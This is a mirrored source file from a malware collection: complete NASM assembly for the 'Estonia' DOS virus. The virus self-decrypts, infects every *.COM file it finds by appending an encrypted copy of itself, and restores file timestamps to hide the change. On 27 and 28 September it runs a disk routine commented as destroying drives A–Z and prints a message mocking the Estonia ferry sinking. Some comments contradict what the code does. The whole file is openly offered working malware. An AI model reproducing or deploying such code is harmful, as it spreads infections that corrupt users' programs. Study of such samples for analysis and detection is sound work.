mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
210 lines
9.9 KiB
NASM
210 lines
9.9 KiB
NASM
|
|
||
|
; D A R K M A N
|
||
|
; Proudly Presents
|
||
|
; E S T O N I A
|
||
|
|
||
|
psp equ 100h
|
||
|
virussize equ extracopy - code
|
||
|
cryptsize equ extracopy - crypted - 01h
|
||
|
dtaoffset equ 02h * virussize + psp
|
||
|
filetime equ dtaoffset + 16h
|
||
|
filedate equ dtaoffset + 18h
|
||
|
filesize equ dtaoffset + 1ah
|
||
|
filename equ dtaoffset + 1eh
|
||
|
memsize equ dtaoffset + 2bh
|
||
|
|
||
|
estonia segment
|
||
|
assume cs:estonia,ds:estonia,es:estonia
|
||
|
org 100h ; Origin of COM-file
|
||
|
|
||
|
code:
|
||
|
call viruscode
|
||
|
virusid db 'ES' ; Estonia Scan-ID
|
||
|
|
||
|
viruscode:
|
||
|
pop bp ; Load BP from stack
|
||
|
sub bp,offset virusid ; BP = delta offset
|
||
|
|
||
|
or bp,bp ; BP = 0?
|
||
|
je crypted ; Equal? Jump to crypted
|
||
|
std ; Set direction flag
|
||
|
lea bx,[bp+crypted] ; AX = offset encrypted code
|
||
|
mov cx,02h ; Transpose 2 times
|
||
|
mov dx,cryptsize ; Decrypt 350 bytes
|
||
|
denexttime:
|
||
|
push cx ; Save CX at stack
|
||
|
mov cx,dx ; CX = size of encrypted code
|
||
|
mov di,bx
|
||
|
add di,dx ; DI = offset of last encrypted code
|
||
|
mov si,di ; SI = offset of last encrypted code
|
||
|
lodsb ; Load last plain byte
|
||
|
sub [bx],al ; Subtract AL from first encrypt byte
|
||
|
denextbyte:
|
||
|
lodsw ; Load 2 encrypted bytes
|
||
|
sub ah,al ; Subtract AL from AH
|
||
|
mov al,ah ; AL = decrypted byte
|
||
|
stosb ; Store a decrypted byte
|
||
|
inc si ; Increase SI
|
||
|
loop denextbyte
|
||
|
pop cx ; Load CX from stack
|
||
|
loop denexttime
|
||
|
crypted:
|
||
|
cld ; Clear direction flag
|
||
|
mov ah,2ah ; Get system date
|
||
|
int 21h ; Do it!
|
||
|
cmp dx,091bh ; 27. September?
|
||
|
jb dontsink ; Below? Jump to dontsink
|
||
|
cmp dx,091ch ; 28. September?
|
||
|
ja dontsink ; Above? Jump to dontsink
|
||
|
|
||
|
xor al,al ; Clear AL
|
||
|
mov cx,19h ; Destroy drives A-Z
|
||
|
formattrack:
|
||
|
push cx ; Save CX at stack
|
||
|
mov ah,2 ; Read a track
|
||
|
xor cx,cx ; Clear CX
|
||
|
xor dh,dh ; Clear DH
|
||
|
mov dl,al
|
||
|
int 13h ; Do it! (disk)
|
||
|
inc al ; Increase AL
|
||
|
pop cx ; Load CX from stack
|
||
|
loop formattrack
|
||
|
|
||
|
mov ah,09h ; Standard output string
|
||
|
lea dx,message ; DX = offset of message
|
||
|
int 21h ; Do it!
|
||
|
|
||
|
int 20h ; Exit to DOS!
|
||
|
dontsink:
|
||
|
mov ah,4ah ; Modify memory allocation
|
||
|
mov bx,1000h ; The new block size is 65535 bytes
|
||
|
int 21h ; Do it!
|
||
|
jc virusexit ; Error? Jump to vitusexit
|
||
|
|
||
|
mov ah,1ah ; Set disk transfer address
|
||
|
lea dx,[bp+dtaoffset] ; DX = offset of new DTA
|
||
|
int 21h ; Do it!
|
||
|
|
||
|
mov ah,4eh ; Find first matching file
|
||
|
mov cx,22h ; File attribute hidden+archive
|
||
|
lea dx,[bp+filespec] ; DX = offset of filespec
|
||
|
findnext:
|
||
|
int 21h ; Do it!
|
||
|
jnc infect ; No error? Jump to infect
|
||
|
virusexit:
|
||
|
mov ah,1ah ; Set disk transfer address
|
||
|
mov dx,80h ; DX = offset of default DTA
|
||
|
int 21h ; Do it!
|
||
|
|
||
|
mov di,100h ; DI = beginning of code
|
||
|
lea si,[bp+realcode] ; SI = offset of realcode
|
||
|
push di ; Restore Instruction Pointer (IP)
|
||
|
movsw ; Move the real code to the beginning
|
||
|
movsw ; " " " " " " "
|
||
|
movsb ; " " " " " " "
|
||
|
ret ; Return!
|
||
|
setfileinfo:
|
||
|
mov cx,[bp+filetime] ; CX = file time in DTA
|
||
|
mov dx,[bp+filedate] ; DX = file date in DTA
|
||
|
mov ax,5701h ; Set file data and time
|
||
|
int 21h ; Do it!
|
||
|
closefile:
|
||
|
mov ah,3eh ; Close file
|
||
|
int 21h ; Do it!
|
||
|
mov ah,4fh ; Find next matching file
|
||
|
jmp short findnext
|
||
|
infect:
|
||
|
mov cx,virussize ; Move 400 bytes
|
||
|
lea di,[bp+extracopy] ; DI = offset of extracopy
|
||
|
lea si,[bp+code] ; SI = offset of code
|
||
|
rep movsb ; Create an extra copy of virus
|
||
|
|
||
|
mov ax,3d02h ; Open file (read/write)
|
||
|
lea dx,[bp+filename] ; DX = offset of filename in DTA
|
||
|
int 21h ; Do it!
|
||
|
jc closefile ; Error? Jump to closefile
|
||
|
xchg ax,bx ; Exchange AX with BX
|
||
|
|
||
|
mov ax,word ptr [bp+filesize]
|
||
|
cmp ax,05h ; AX = 5? (AX < 5)
|
||
|
jb closefile ; Less? Jump to closefile
|
||
|
cmp ax,(65535-memsize) ; AX = 64432? (AX > 64432)
|
||
|
ja closefile ; Greater? Jump to closefile
|
||
|
|
||
|
sub ax,03h ; AX = offset of virus code
|
||
|
mov [bp+offset estoniacode+01h],ax
|
||
|
|
||
|
mov ah,3fh ; Read from file
|
||
|
mov cx,05h ; Read 5 bytes
|
||
|
lea dx,[bp+virussize+realcode]
|
||
|
int 21h ; Do it!
|
||
|
|
||
|
cmp [bp+virussize+offset realcode+03h],'SE'
|
||
|
je closefile ; Infected? Jump to closefile
|
||
|
|
||
|
lea di,[bp+virussize+cryptvalues]
|
||
|
in ax,40h ; AX = port 40h
|
||
|
stosw ; Store AX in crypt values
|
||
|
in ax,40h ; AX = port 40h
|
||
|
stosw ; Store AX in crypt value
|
||
|
|
||
|
push bx ; Save BX at stack
|
||
|
lea bx,[bp+virussize+crypted]
|
||
|
mov cx,02h ; Transpose 2 times
|
||
|
mov dx,cryptsize ; Encrypt 350 bytes
|
||
|
ennexttime:
|
||
|
push cx ; Save CX at stack
|
||
|
mov cx,dx ; CX = size of plain code
|
||
|
mov di,bx ; DI = offset of plain code
|
||
|
mov si,bx ; SI = offset of plain code
|
||
|
inc di ; Increase DI
|
||
|
ennextbyte:
|
||
|
lodsw ; Load 2 plain bytes
|
||
|
add al,ah ; Add AH to AL
|
||
|
stosb ; Store a encrypted byte
|
||
|
dec si ; Decrease SI
|
||
|
loop ennextbyte
|
||
|
add [bx],al ; Add AL to plain byte
|
||
|
pop cx ; Load CX from stack
|
||
|
loop ennexttime
|
||
|
pop bx ; Load BX from stack
|
||
|
|
||
|
mov ax,4202h ; Move file pointer to the end
|
||
|
xor cx,cx ; Clear CX
|
||
|
cwd ; Convert word to doubleword
|
||
|
int 21h ; Do it!
|
||
|
|
||
|
mov ah,40h ; Write to file
|
||
|
mov cx,virussize ; Write 400 bytes
|
||
|
lea dx,[bp+extracopy] ; DX = offset of extracopy
|
||
|
int 21h ; Do it!
|
||
|
cmp ax,cx ; Disk full?
|
||
|
jne infectdone ; Error? Jump to infectdone
|
||
|
|
||
|
mov ax,4200h ; Move file pointer to the beginning
|
||
|
xor cx,cx ; Clear CX
|
||
|
cwd ; Convert word to doubleword
|
||
|
int 21h ; Do it!
|
||
|
|
||
|
mov ah,40h ; Write to file
|
||
|
mov cx,05h ; Write 5 bytes
|
||
|
lea dx,[bp+estoniacode] ; DX = offset of estoniacode
|
||
|
int 21h ; Do it!
|
||
|
infectdone:
|
||
|
jmp setfileinfo
|
||
|
|
||
|
cryptvalues db 04h dup(?) ; Cryption values
|
||
|
estoniacode db 0e8h,00h,00h,'ES' ; New code of infected file
|
||
|
realcode db 0cdh,20h ; Real code of infected file
|
||
|
db 03h dup(?)
|
||
|
filespec db '*.COM',00h ; File specification
|
||
|
message db 'Your drives were ' ; This message will be shown the
|
||
|
db 'on the Estonia...' ; 27 / 28. September and then the
|
||
|
db ' They DIDN''T sur' ; drives (A-Z) bootsector will
|
||
|
db 'vive!!!',0dh,0ah ; look like it is being destroyed!!!
|
||
|
db '$'
|
||
|
extracopy:
|
||
|
|
||
|
estonia ends
|
||
|
end code
|